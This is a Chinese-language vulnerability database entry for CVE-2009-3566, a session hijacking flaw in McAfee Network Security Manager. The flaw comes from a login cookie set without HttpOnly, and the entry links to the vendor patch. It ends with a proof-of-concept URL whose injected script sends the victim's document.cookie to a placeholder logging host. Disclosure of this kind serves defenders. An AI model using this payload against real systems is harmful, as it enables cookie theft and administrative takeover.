Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:12633
HistoryNov 13, 2009 - 12:00 a.m.

McAfee Network Security Manager会话劫持漏洞

2009-11-1300:00:00
Root
www.seebug.org
15

0.007 Low

EPSS

Percentile

78.8%

JSON

BUGTRAQ ID: 37004
CVE ID: CVE-2009-3566

McAfee Network Security Manager是一款功能强大的入侵防护解决方案。

当用户加载Network Security Manager管理控制台的登录页面时服务端会在执行认证之前在浏览器中设置Cookie。由于没有设置HttpOnly标记,客户端的 JavaScript也可以访问这个Cookie,因此任何可以访问这个Cookie的攻击者都可以通过劫持会话绕过认证,获得对Network Security Manager的管理访问。
0
McAfee Network Security Manager 5.1.7 7
厂商补丁:

McAfee

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://secure.nai.com/apps/downloads/my_products/login.asp


                                                https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57

Related

cve 1
packetstorm 1
securityvulns 2
prion 1
cve
cve
CVE-2009-3566
2009-11-13 15:30:00
packetstorm
packetstorm
McAfee Network Security Manager Bypass / Hijack
2009-11-17 00:00:00
securityvulns
securityvulns
[SWRX-2009-002] McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
2009-11-12 00:00:00
McAfee Network Security Manager multiple security vulnerabilities
2009-11-12 00:00:00
prion
prion
Cross site scripting
2009-11-13 15:30:00

0.007 Low

EPSS

Percentile

78.8%

JSON
Related for SSV:12633
cve1packetstorm1securityvulns2prion1